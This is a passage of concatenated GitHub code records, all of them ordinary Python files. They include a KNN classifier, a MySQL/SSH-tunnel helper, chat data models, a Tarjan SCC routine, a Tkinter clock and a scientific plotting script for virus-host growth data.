1\r\n\r\n if n - ties == 0:\r\n return wins, losses, ties, 0\r\n avg = wins / (n - ties) * 100\r\n return wins, losses, ties, avg","repo_name":"JohnEaganFS/CSCI-154-Simulation-Projects","sub_path":"Blackjack/customGame.py","file_name":"customGame.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72655583787","text":"from calc_engine import *\nimport itertools\nimport hashlib\nimport common_utils\n\nSAVE_INDIRECT_LINES = True\nBASE_DIRECTORY = \"623-01/json\"\n\n# Initialize the table to keep track of known lines\nall_team_names = set(list(initial_lines_df['home_team']) + list(initial_lines_df['away_team']))\nall_possible_matchups = [(tm1, tm2) for tm1, tm2 in itertools.product(all_team_names, all_team_names) if tm1 != tm2]\n\nknown_lines = set()\n\n# Have to store the lines from the initial df as known so we don't save over them\nfor i in range(len(initial_lines_df)):\n row = initial_lines_df.iloc[i]\n known_lines.add(common_utils.get_id_for_matchup(row['home_team'], row['away_team']))\n\n# Iterative process whereby we calculate any new lines that we can, then incorporate these new lines during the next iteration\nn = 1\ncurrent_lines_df = initial_lines_df\nwhile True: # For now, go forever, but eventually will change this\n print(f'Iteration {n}')\n\n new_lines = []\n for tm1, tm2 in all_possible_matchups:\n matchup_id = common_utils.get_id_for_matchup(tm1, tm2)\n if matchup_id not in known_lines:\n line = calculate_line(tm1, tm2, neutral=True, lines_df=current_lines_df)\n if line:\n new_lines.append(line)\n known_lines.add(matchup_id)\n\n print(f'Found {len(new_lines)} new lines')\n\n if SAVE_INDIRECT_LINES:\n outfilename = f'{BASE_DIRECTORY}/indirectlines-{n}.json'\n try:\n with open(outfilename, 'w') as outfile:\n outfile.write(json.dumps(new_lines))\n except TypeError:\n for line in new_lines:\n line['neutral'] = bool(line['neutral'])\n with open(outfilename, 'w') as outfile:\n outfile.write(json.dumps(new_lines))\n print(f'Saved to file {outfilename}')\n infilenames.append(outfilename)\n\n current_lines_df = lines_df_from_input_files_list(infilenames)\n n += 1","repo_name":"ldp77/gridline","sub_path":"calculate_indirect.py","file_name":"calculate_indirect.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1066846753","text":"c=0\nc2=0\nvp=0\n\npb=None\nwhile True:\n np=str(input('Digite o nome do produto: '))\n c=c+1\n pp= float(input('digite o preço do produto: '))\n menor=pp\n if menor<=pp:\n menor= pp\n pb= np\n vp= vp + pp\n if pp>1000:\n c2=c2+1\n per= str (input('Quer continuar?: S/N')).upper()\n if per=='N':\n break\nprint (f'O total gasto na compra foi {vp}\\n {c2} produtos custaram mais de 1000\\n O produto mais barato foi {pb}')\n\n","repo_name":"abinoamenezes/CursoEmVideo","sub_path":"ex24.py","file_name":"ex24.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30454066547","text":"import configparser\nimport os\nimport re\nimport shutil\n\n\"\"\"\nScript mirrors the content in ../serialize_raw_640 but instead of the original\n.png-file, corresponding .png-file from DESTINATION_PATH_DENOISED and \nDESTINATION_PATH_COMBINED is copied.\n\"\"\"\n\ndef copy_files(SOURCE_PATH_RAW, \n SOURCE_PATH_DENOISED, \n SOURCE_PATH_COMBINED, \n DESTINATION_PATH_DENOISED, \n DESTINATION_PATH_COMBINED):\n pattern = re.compile('.*\\.xml$')\n # Traverse through the folders\n for folder_fold in os.listdir(SOURCE_PATH_RAW):\n if os.path.isdir(SOURCE_PATH_RAW+'/'+folder_fold):\n for folder_train_test in os.listdir(SOURCE_PATH_RAW+'/'+folder_fold):\n for filename in os.listdir(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test):\n if pattern.match(filename):\n if not os.path.exists(DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test):\n os.makedirs(DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test)\n os.makedirs(DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test)\n\n # Copy the files to respective folder\n file_denoised = filename.split('.')[0]+'.png'\n file_combined = filename.split('.')[0]+'.png'\n shutil.copy(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test+'/'+filename, \\\n DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test+'/'+filename)\n shutil.copy(SOURCE_PATH_DENOISED+'/'+file_denoised, \\\n DESTINATION_PATH_DENOISED+'/'+folder_fold+'/'+folder_train_test+'/'+file_denoised)\n shutil.copy(SOURCE_PATH_RAW+'/'+folder_fold+'/'+folder_train_test+'/'+filename, \\\n DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test+'/'+filename)\n shutil.copy(SOURCE_PATH_COMBINED+'/'+file_combined, \\\n DESTINATION_PATH_COMBINED+'/'+folder_fold+'/'+folder_train_test+'/'+file_combined)\n\nif __name__ == '__main__':\n config = configparser.ConfigParser()\n config.read('preprocessing.config')\n copy_filtered_to_serialize = config['COPY_FILTERED_TO_SERIALIZE']\n\n copy_files(\n copy_filtered_to_serialize['source_path_raw'], \n copy_filtered_to_serialize['source_path_denoised'], \n copy_filtered_to_serialize['source_path_combined'], \n copy_filtered_to_serialize['destination_path_denoised'], \n copy_filtered_to_serialize['destination_path_combined']\n )\n","repo_name":"Zsombroo/jkpg-building-detection","sub_path":"copy_filtered_to_serialize.py","file_name":"copy_filtered_to_serialize.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75223449067","text":"'''\n\n WEIGHTED K NEAREST NEIGHBOR ALGORITHM\n\n\n'''\n\n\n''' imports '''\nfrom random import randrange\nfrom math import sqrt\nimport numpy as np\nimport os\n\n\n\n'''\nCalculate the Euclidean distance\n(sum of squared distances)\nbetween two vectors of data\n'''\ndef euclidean_distance(vec1, vec2):\n distance = 0.0\n for i in range(1, len(vec2)-1):\n distance += np.sum(np.square(vec1[i]-vec2[i]))\n return np.sqrt(distance)\n\n\n\n'''\nCross validation method to split a data into n folds,\nreturn grouped data inside a list\n'''\ndef cross_validation(data, n):\n folds = list()\n data_copy = list(data)\n fold_size = int(len(data)/n)\n for _ in range(n):\n fold = list()\n while len(fold) < fold_size:\n index = randrange(len(data_copy))\n fold.append(data_copy.pop(index)) # delete the data row\n folds.append(fold) # after selecting it\n return folds\n\n\n'''\nRuns knn algorithm through applying cross validation\non training data in case test dataset is not provided\n'''\ndef weighted_knn_with_CV(dataset, n, k):\n folds = cross_validation(dataset, n)\n accuracy_list = list()\n for fold in folds:\n train_set = list(folds)\n train_set.remove(fold)\n train_set = sum(train_set, [])\n test_set = list()\n for row in fold:\n row_copy = list(row)\n test_set.append(row_copy)\n row_copy[-1] = None\n predicted = weighted_knn(train_set, test_set, k)\n actual = [row[-1] for row in fold]\n accuracy = get_accuracy(actual, predicted)\n accuracy_list.append(accuracy)\n return accuracy_list\n\n\n'''\nRuns weighted knn algorithm with the provided test dataset\n'''\ndef weighted_knn(train_set, test_set, k):\n scores = list()\n predicted = weighted_knn_helper(train_set, test_set, k)\n actual = [row[-1] for row in test_set]\n accuracy = get_accuracy(actual, predicted)\n scores.append(accuracy)\n return scores\n\n\n'''\nWeighted K Nearest Neighbor algorithm to classify\nthe image according to the k neighbors' weights\n'''\ndef weighted_knn_helper(train, test, k):\n predictions = list()\n for row in test:\n output = predict_classification(train, row, k)\n predictions.append(output)\n return(predictions)\n\n\n'''\nPredict label of the image through using\ninverse distance weighting method\n'''\ndef predict_classification(train, test_row, k):\n # get k nearest neighbors\n neighbors = get_neighbors(train, test_row, k)\n\n '''\n label dictionary to store their associated weights\n these labels can be changed to any label name\n according to the data that is used\n '''\n labels = {\"label1\" : 0, \"label2\" : 0, \"label3\" : 0}\n\n '''\n for each points/data in neighbor,\n sum up their inverse distance\n '''\n for neighbor in neighbors:\n label = neighbor[0][-1]\n dist = neighbor[1]\n # do not divide with zero\n if dist != 0:\n labels[label] += 1/dist\n \n # return the most weighted label \n # as classification\n label = max(labels.keys(), key=(lambda key: labels[key]))\n return label\n\n\n'''\nReturn the list of nearest k neighbors of test_row\nafter obtaining and sorting the distances\nbetween test data and all training data\n'''\ndef get_neighbors(train, test_row, k):\n distances = list()\n for train_row in train:\n # calculate euclidean distance between vectors\n dist = euclidean_distance(test_row, train_row)\n # add distance to list to sort it later\n distances.append((train_row, dist))\n # sort distances in ascending order\n # to find the nearest neighbors\n distances.sort(key=lambda tup: tup[1])\n neighbors = list()\n for i in range(k):\n neighbors.append(distances[i])\n return neighbors\n\n\n'''\nCalculate the accuracy of classification\nthrough calculating the actual and predicted\nresult\n'''\ndef get_accuracy(actual, predicted):\n correct = 0\n for i in range(len(actual)):\n if actual[i] == predicted[i]:\n correct += 1\n return correct / float(len(actual)) * 100.0","repo_name":"didar00/Weighted-KNN-Algorithm-With-Inverse-Distance-Weighting-Method-Python","sub_path":"weighted_knn.py","file_name":"weighted_knn.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21452796706","text":"from django.conf.urls import include, url\nfrom valegas.produtos.views import lista_produtos, novo_produto, editar_produto, lista_categorias, nova_categoria, editar_categoria\n\nurlpatterns = [\n\turl(r'^lista-produtos/$', lista_produtos, name='lista_produtos'),\n\turl(r'^lista-categorias/$', lista_categorias, name='lista_categorias'),\n\turl(r'^novo-produto/$', novo_produto, name='novo_produto'),\n\turl(r'^editar-produto/(?P\\d+)$', editar_produto, name='editar_produto'),\n\turl(r'^nova-categoria/$', nova_categoria, name='nova_categoria'),\n\turl(r'^editar-categoria/(?P\\d+)$', editar_categoria, name='editar_categoria'),\n]","repo_name":"renatobelini/valegas","sub_path":"valegas/valegas/produtos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74876049387","text":"import json\nfrom datetime import datetime\nfrom typing import Union\n\nfrom public.common import logger, reda_conf\nimport pymysql\nimport pymysql.cursors\nfrom sshtunnel import SSHTunnelForwarder\n\n\n# 读取配置参数\nDB = reda_conf('DB')\nSSH = DB.get('SSH')\nMYSQL = DB.get('MYSQL')\nORACLE = DB.get('ORACLE')\nREDIS = DB.get('REDIS')\nREDIS_CLUSTER = DB.get('REDIS_CLUSTER')\nREDIS_CLUSTER_PASSWORD = DB.get('REDIS_CLUSTER_PASSWORD')\n\n\nclass MysqlServer:\n \"\"\"\n 初始化数据库连接(支持通过SSH隧道的方式连接),并指定查询的结果集以字典形式返回\n \"\"\"\n\n def __init__(self, db_host, db_port, db_user, db_pwd, db_database, ssh=False,\n **kwargs):\n \"\"\"\n 初始化方法中, 连接mysql数据库, 根据ssh参数决定是否走SSH隧道方式连接mysql数据库\n \"\"\"\n self.server = None\n if ssh:\n self.server = SSHTunnelForwarder(\n ssh_address_or_host=(kwargs.get(\"host\"), kwargs.get(\"port\")), # ssh 目标服务器 ip 和 port\n ssh_username=kwargs.get(\"user\"), # ssh 目标服务器用户名\n ssh_pkey=kwargs.get(\"pkey\"), # ssh 目标服务器用户密码\n remote_bind_address=(db_host, db_port), # mysql 服务ip 和 part\n local_bind_address=('127.0.0.1', 3307), # ssh 目标服务器的用于连接 mysql 或 redis 的端口,该 ip 必须为 127.0.0.1\n )\n self.server.start()\n db_host = self.server.local_bind_host # server.local_bind_host 是 参数 local_bind_address 的 ip\n db_port = self.server.local_bind_port # server.local_bind_port 是 参数 local_bind_address 的 port\n # 建立连接\n self.conn = pymysql.connect(host=db_host,\n port=db_port,\n user=db_user,\n password=db_pwd,\n database=db_database,\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor # 加上pymysql.cursors.DictCursor这个返回的就是字典\n )\n # 创建一个游标对象\n self.cursor = self.conn.cursor()\n\n def query_all(self, sql):\n \"\"\"\n 查询所有符合sql条件的数据\n :param sql: 执行的sql\n :return: 查询结果\n \"\"\"\n try:\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchall()\n # 关闭数据库链接和隧道\n self.close()\n return self.verify(data)\n except Exception as e:\n logger.error(f\"查询所有符合sql条件的数据报错: {e}\")\n raise e\n\n def query_one(self, sql):\n \"\"\"\n 查询符合sql条件的数据的第一条数据\n :param sql: 执行的sql\n :return: 返回查询结果的第一条数据\n \"\"\"\n try:\n self.conn.commit()\n self.cursor.execute(sql)\n data = self.cursor.fetchone()\n # 关闭数据库链接和隧道\n self.close()\n return self.verify(data)\n except Exception as e:\n logger.error(f\"查询符合sql条件的数据的第一条数据报错: {e}\")\n raise e\n\n def insert(self, sql):\n \"\"\"\n 插入数据\n :param sql: 执行的sql\n \"\"\"\n try:\n self.cursor.execute(sql)\n # 提交 只要数据库更新就要commit\n self.conn.commit()\n # 关闭数据库链接和隧道\n self.close()\n except Exception as e:\n logger.error(f\"插入数据报错: {e}\")\n raise e\n\n def update(self, sql):\n \"\"\"\n 更新数据\n :param sql: 执行的sql\n \"\"\"\n try:\n self.cursor.execute(sql)\n # 提交 只要数据库更新就要commit\n self.conn.commit()\n # 关闭数据库链接和隧道\n self.close()\n except Exception as e:\n logger.error(f\"更新数据报错: {e}\")\n raise e\n\n def query(self, sql, one=True):\n \"\"\"\n 根据传值决定查询一条数据还是所有\n :param sql: 查询的SQL语句\n :param one: 默认True. True查一条数据,否则查所有\n :return:\n \"\"\"\n try:\n if one:\n return self.query_one(sql)\n else:\n return self.query_all(sql)\n except Exception as e:\n logger.error(f\"查询数据报错: {e}\")\n raise e\n\n def close(self):\n \"\"\"\n 断开游标,关闭数据库\n 如果开启了SSH隧道,也关闭\n :return:\n \"\"\"\n # 关闭游标\n self.cursor.close()\n # 关闭数据库链接\n self.conn.close()\n # 如果开启了SSH隧道,则关闭\n if self.server:\n self.server.close()\n\n def verify(self, result: dict) -> Union[dict, None]:\n \"\"\"验证结果能否被json.dumps序列化\"\"\"\n # 尝试变成字符串,解决datetime 无法被json 序列化问题\n try:\n json.dumps(result)\n except TypeError: # TypeError: Object of type datetime is not JSON serializable\n for k, v in result.items():\n if isinstance(v, datetime):\n result[k] = str(v)\n return result\n\n\nif __name__ == '__main__':\n ssh = True\n db = MysqlServer(MYSQL['host'], MYSQL['port'], MYSQL['user'], MYSQL['password'], MYSQL['db'], ssh,\n **SSH)\n logger.debug(db.query_one(sql=\"select * from user limit 2;\"))\n","repo_name":"huangyaomian/web-ui","sub_path":"utils/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71520816106","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport setuptools\n\nUSING_PYTHON2 = (sys.version_info.major == 2)\nUSING_PYTHON3 = not USING_PYTHON2\n\nauthor = 'Dave Vandenbout'\nemail = 'devb@xess.com'\nversion = '0.0.4'\n\nif 'sdist' in sys.argv[1:]:\n with open('pygmyhdl/pckg_info.py','w') as f:\n for name in ['version','author','email']:\n f.write(\"{} = '{}'\\n\".format(name,locals()[name]))\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read().replace('.. :changelog:', '')\n\nrequirements = [\n # Put package requirements here\n 'future >= 0.15.0',\n 'myhdl',\n 'myhdlpeek',\n ]\nif USING_PYTHON3:\n requirements.extend([\n 'byteplay3',\n ])\nelse:\n requirements.extend([\n 'byteplay',\n ])\n\ntest_requirements = [\n # Put package test requirements here\n 'pytest',\n]\n\nsetup(\n name='pygmyhdl',\n version = version,\n description=\"MyHDL hardware design language encased in the tasty PygMyHDL wrapper.\",\n long_description=readme + '\\n\\n' + history,\n author = author,\n author_email= email,\n url='https://github.com/devbisme/pygmyhdl',\n# packages=['pygmyhdl',],\n packages=setuptools.find_packages(),\n entry_points={'console_scripts':['pygmyhdl = pygmyhdl.__main__:main']},\n package_dir={'pygmyhdl':\n 'pygmyhdl'},\n include_package_data=True,\n package_data={'pygmyhdl': ['*.gif', '*.png']},\n scripts=[],\n install_requires=requirements,\n license=\"MIT\",\n zip_safe=False,\n keywords='pygmyhdl',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n ],\n test_suite='tests',\n tests_require=test_requirements\n)\n","repo_name":"devbisme/pygmyhdl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"42466896387","text":"from dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import List\nimport uuid\n\n\nclass User:\n def __init__(self, user_id: str, name: str, email: str, password: str):\n self.user_id = user_id\n self.name = name\n self.email = email\n self.password = password\n self.personal_chats: List[PersonalChat] = []\n self.group_chats: List[GroupChat] = []\n\n def __eq__(self, other):\n if isinstance(other, User):\n return self.user_id == other.user_id\n else:\n return False\n\n\n@dataclass(frozen=True)\nclass Content:\n text: str\n image_ref: str\n video_ref: str\n\n\nclass Message:\n def __init__(self, message_id: str, sender: User, chat, content: Content):\n self.message_id = message_id\n self.sender = sender\n self.chat = chat\n self.content = content\n self.timestamp = datetime.utcnow()\n\n def __eq__(self, other):\n if isinstance(other, Message):\n return self.message_id == other.message_id\n else:\n return False\n\n\nclass GroupChat:\n def __init__(self, group_chat_id: str, name: str, members: List[User]):\n self.group_chat_id = group_chat_id\n self.name = name\n self.members = members\n self.creator = members[0]\n self.admins: List[User] = []\n self.messages: List[Message] = []\n self.calls: List[Call] = []\n\n def __eq__(self, other):\n if isinstance(other, GroupChat):\n return self.group_chat_id == other.group_chat_id\n else:\n return False\n\n def add_member(self, member: User):\n if member not in self.members:\n self.members.append(member)\n member.group_chats.append(self)\n\n def remove_member(self, member: User):\n if member in self.members:\n self.members.remove(member)\n member.group_chats.remove(self)\n\n def make_admin(self, member: User):\n if (member in self.members) and (member != self.creator) and (member not in self.admins):\n self.admins.append(member)\n\n def demote_admin(self, admin: User):\n if admin in self.admins:\n self.admins.remove(admin)\n\n\nclass PersonalChat:\n def __init__(self, personal_chat_id: str, user1: User, user2: User):\n self.personal_chat_id = personal_chat_id\n self.user1 = user1\n self.user2 = user2\n self.messages: List[Message] = []\n\n def __eq__(self, other):\n if isinstance(other, PersonalChat):\n return self.personal_chat_id == other.personal_chat_id\n else:\n return False\n\n\nclass Call:\n def __init__(self, call_id: str, caller: User):\n self.call_id = call_id\n self.caller = caller\n self.participants: List[User] = [caller]\n self.start_time = datetime.utcnow()\n self.end_time = None\n self.duration = None\n\n def __eq__(self, other):\n if isinstance(other, Call):\n return self.call_id == other.call_id\n else:\n return False\n\n def end_call(self):\n self.participants = []\n self.end_time = datetime.utcnow()\n self.duration = self.end_time - self.start_time\n\n\ndef create_user(name: str, email: str, password: str) -> User:\n user_id = str(uuid.uuid4())\n user = User(user_id, name, email, password)\n return user\n\n\ndef create_group_chat(name: str, members: List[User]) -> GroupChat:\n group_chat_id = str(uuid.uuid4())\n group_chat = GroupChat(group_chat_id, name, members)\n for member in members:\n member.group_chats.append(group_chat)\n return group_chat\n\n\ndef add_user_to_group_chat(member: User, group_chat: GroupChat):\n group_chat.add_member(member)\n if group_chat not in member.group_chats:\n member.group_chats.append(group_chat)\n\n\ndef remove_user_from_group_chat(member: User, group_chat: GroupChat):\n group_chat.remove_member(member)\n if group_chat in member.group_chats:\n member.group_chats.remove(group_chat)\n\n\ndef make_admin_of_group_chat(user: User, group_chat: GroupChat):\n group_chat.make_admin(user)\n\n\ndef send_message(sender: User, chat: GroupChat, content: Content):\n message_id = str(uuid.uuid4())\n message = Message(message_id, sender, chat, content)\n chat.messages.append(message)\n\n\ndef delete_message(message: Message, chat: GroupChat):\n if message in chat.messages:\n chat.messages.remove(message)\n\n\ndef find_messages_by_text(text: str, chat: GroupChat) -> List[Message]:\n founded_results = []\n for message in chat.messages:\n if text in message.content.text:\n founded_results.append(message)\n return founded_results\n","repo_name":"Readiee/MRPO_Labs","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29551219246","text":"from tkinter import Tk, Label\nimport time\n\n### create a tkinter window\n\nmaster = Tk()\nmaster.title('Digital Clock')\n\n### create a function using \"def\"\n### This function alows you to display timei on the label\n#### %I = hour; %M = minutes; %p = AM/PM\n\ndef get_time():\n timeVar = time.strftime(\"%I:%M:%S %p\")\n clock.config(text=timeVar)\n clock.after(1000,get_time)\n\n### Stylize your Label Widget\n### Feel free to change : font, size, background and foreground colors!!\n\nclock = Label(master, font=('Arial', 120),bg='#872229',fg='#DA6998')\nclock.pack()\n\nget_time()\n\n#put it in a loop\nmaster.mainloop()","repo_name":"GracieCreates/Python-Mini-Projects","sub_path":"Digital Clock/Clock.py","file_name":"Clock.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7927885592","text":"from typing import List\nimport sys\n\nsys.setrecursionlimit(10**6)\n\n\nclass Tarjan(list):\n vis: List[int]\n low: List[int]\n stack: List[int]\n in_stack: List[int]\n sccs: List[List[int]]\n vis_cnt: int\n\n def tarjan(self):\n G = self\n n = len(G)\n G.vis, G.low = [-1] * n, [0] * n\n G.stack, G.in_stack = [], [0] * n\n G.vis_cnt = 0\n G.sccs = []\n for i in range(n):\n if G.vis[i] == -1:\n G.dfs(i)\n invV = [-1] * n\n for i, scc in enumerate(G.sccs):\n for j in scc:\n invV[j] = i\n sccE = set()\n for i in range(n):\n for j in G[i]:\n sccE.add((invV[i], invV[j]))\n sccE = list(sccE)\n return G.sccs, sccE\n\n def dfs(self, i):\n G = self\n G.vis[i] = G.low[i] = G.vis_cnt\n G.vis_cnt += 1\n G.stack.append(i)\n G.in_stack[i] = 1\n for j in G[i]:\n if G.vis[j] == -1:\n G.dfs(j)\n G.low[i] = min(G.low[i], G.low[j])\n elif G.in_stack[j]:\n G.low[i] = min(G.low[i], G.vis[j])\n if G.low[i] == G.vis[i]:\n scc = []\n s = G.stack\n while s[-1] != i:\n scc.append(s.pop())\n scc.append(s.pop())\n for x in scc:\n G.in_stack[x] = 0\n G.sccs.append(scc)\n return\n","repo_name":"caph1993/avispa-lattices","sub_path":"avispa_lattices/utils/algorithm_tarjan.py","file_name":"algorithm_tarjan.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21843459447","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom helpers import *\nfrom collections import Counter\n\n########################################################\n# read data\n########################################################\n\n# first load subset of data that contain replicate\nndf = pd.read_csv('../data/input/preprocessed/nissimov/with_reps.csv').set_index('organism')\nndf = ndf[ndf['virusName']=='EhV-99B1']\nndfh,ndfv = ndf.loc['H'],ndf.loc['V']\n\n# load master experimental dataset\nmaster_df = pd.read_csv('../data/input/processed/processed_data.csv',index_col='id')\nabiotic_treatment_df = pd.read_csv('../data/input/preprocessed/reu_2019/treatments.csv',index_col='id')\nabiotic_treatment_df = abiotic_treatment_df[abiotic_treatment_df['treatment']=='Replete']\nmaster_df = pd.concat((master_df,abiotic_treatment_df))\ntreatments = master_df.query('control==False').copy() # remove controls\ntids = treatments.index.unique() # unique ids\n\n# sort experimental data into a single dictionary\ndatasets = {}\nfor tid in tids[:-1]:\n df = treatments.loc[tid].copy()\n df.loc[:,'log_sigma'] = 0.2\n df.loc[df.organism == 'H', 'time'] = df.loc[df.organism == 'H', 'time'].copy() -\\\n min(df.loc[df.organism == 'H', 'time'])\n df.loc[df.organism == 'V', 'time'] = df.loc[df.organism == 'V', 'time'].copy() -\\\n min(df.loc[df.organism == 'V', 'time'])\n datasets[tid] = df\n\n# load posteriors into a dictionary\nposteriors = {}\ni = 1\nprint('load data')\nfor tid in tids[:-1]:\n print(i,tid)\n i = i+1\n #f = '../data/output/jun25th2021/'+tid+'.csv'\n f = '../data/output/jun27th2021_million/'+tid+'.csv'\n n = 100\n num_lines = sum(1 for l in open(f))\n skip_idx = [x for x in range(1, num_lines) if x % n != 0]\n posteriors[tid] = pd.read_csv(f,low_memory=False,skiprows=skip_idx)\n\n########################################################\n# load priors\n########################################################\n\nmu_prior,phi_prior,beta_prior,tau_prior,H0_prior,V0_prior = load_priors(df)\n\n########################################################\n# setup figures\n########################################################\n\nf1,ax1 = py.subplots(1,2,figsize=[9,4])\nf2,ax2 = py.subplots(3,1,figsize=[12,12])\nf3a,ax3a = py.subplots(4,4,figsize=[18,18])\nf3b,ax3b = py.subplots(4,4,figsize=[18,18])\nf3c,ax3c = py.subplots(4,4,figsize=[18,18])\nf3d,ax3d = py.subplots(4,4,figsize=[18,18])\nf4,ax4 = py.subplots()\n\nf3a.subplots_adjust(wspace=0.4,hspace=0.6)\nf3b.subplots_adjust(wspace=0.4,hspace=0.6)\nf3c.subplots_adjust(wspace=0.4,hspace=0.6)\nf3d.subplots_adjust(wspace=0.4,hspace=0.6)\n\n# figure font size\nfs = 12\n\n########################################################\n# do plotting\n########################################################\n\n# figure 1\nax1[0].plot(ndfh.time,ndfh.rep1,'-o',label='rep 1')\nax1[0].plot(ndfh.time,ndfh.rep2,'-^',label='rep 2')\nax1[0].plot(ndfh.time,ndfh.rep3,'-*',label='rep 3')\nax1[1].plot(ndfv.time,ndfv.rep1,'-o')\nax1[1].plot(ndfv.time,ndfv.rep2,'-^')\nax1[1].plot(ndfv.time,ndfv.rep3,'-*')\nl = ax1[0].legend(prop={'size':fs})\nl.draw_frame(False)\nax1[0].semilogy()\nax1[1].semilogy()\nfor a in ax1:\n a.set_xlabel('Time (hours)',fontsize=fs)\nax1[0].set_ylabel('Host (ml$^{-1}$)',fontsize=fs)\nax1[1].set_ylabel('Virus (ml$^{-1}$)',fontsize=fs)\nf1.subplots_adjust(wspace=0.3)\n\n# figure 3\nax3all = np.concatenate((ax3a.flatten(),ax3b.flatten(),ax3c.flatten(),ax3d .flatten()))\nhosts = ax3all[0:-1:2]\nviruses = ax3all[1:-1:2]\ni = 1\nallbests = pd.DataFrame()\nbestmodels = []\nprint('begin plotting')\nfor (hax,vax,tid) in zip(hosts,viruses,tids[:-1]):\n print(i,tid)\n i = i+1\n ddf = datasets[tid]\n models = get_models(ddf)\n hdat =ddf[ddf.organism=='H']\n vdat =ddf[ddf.organism=='V']\n hax.errorbar(hdat.time,np.log(hdat.abundance),yerr=hdat.log_sigma)\n vax.errorbar(vdat.time,np.log(vdat.abundance),yerr=vdat.log_sigma)\n mdf = posteriors[tid] # posteriors\n mi = mdf.loc[mdf.chi==min(mdf.chi)].index[0]\n bestmodelstring = mdf.iloc[mi]['Unnamed: 0']\n bestmodels.append(bestmodelstring)\n bestmodel = models[bestmodelstring]\n bestmodelposteriors = mdf[mdf['Unnamed: 0']==bestmodelstring]\n bestmodelposteriors['algalHost'] = hdat.algalHost.unique()[0]\n bestmodelposteriors['algalHostTaxon'] = hdat.algalHostTaxon.unique()[0]\n bestmodelposteriors['virusName'] = vdat.virusName.unique()[0]\n allbests = pd.concat((allbests,bestmodelposteriors))\n set_optimal_parameters(bestmodel,bestmodelposteriors)\n mod = bestmodel.integrate()\n hax.plot(bestmodel.times,np.log(mod['H']),c='r',lw=2,zorder=2)\n vax.plot(bestmodel.times,np.log(mod['V']),c='r',lw=2,zorder=2)\n hax.set_title(hdat.algalHost.unique()[0])\n vax.set_title(vdat.virusName.unique()[0])\n for a in range(1000):\n set_random_param(bestmodel,bestmodelposteriors)\n mod = bestmodel.integrate()\n hax.plot(bestmodel.times,np.log(mod['H']),c=str(0.8),lw=1,zorder=1)\n vax.plot(bestmodel.times,np.log(mod['V']),c=str(0.8),lw=1,zorder=1)\n\nsns.boxplot(x='algalHostTaxon',y='mu',data=allbests,ax=ax2[0])\nsns.boxplot(x='algalHostTaxon',y='phi',data=allbests,ax=ax2[1])\nsns.boxplot(x='algalHostTaxon',y='beta',data=allbests,ax=ax2[2])\n\nfor a in ax2:\n a.semilogy()\n\nkeys, counts = np.unique(bestmodels, return_counts=True)\nax4.bar(keys, counts)\nax4.set_xlabel('Number of infection states')\nax4.set_ylabel('Number of datasets')\n\n########################################################\n# save figures\n########################################################\n\nf1.savefig('../figures/figure1',bbox_inches='tight',pad_inches=0.1)\nf2.savefig('../figures/figure2',bbox_inches='tight',pad_inches=0.1)\nf3a.savefig('../figures/figure3a',bbox_inches='tight',pad_inches=0.1)\nf3b.savefig('../figures/figure3b',bbox_inches='tight',pad_inches=0.1)\nf3c.savefig('../figures/figure3c',bbox_inches='tight',pad_inches=0.1)\nf3d.savefig('../figures/figure3d',bbox_inches='tight',pad_inches=0.1)\nf4.savefig('../figures/figure4',bbox_inches='tight',pad_inches=0.1)\n","repo_name":"dtalmy/growth_curves","sub_path":"src/plot_output_master.py","file_name":"plot_output_master.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32324302090","text":"from scapy.all import *\nimport re\nimport base64\n\npkts = 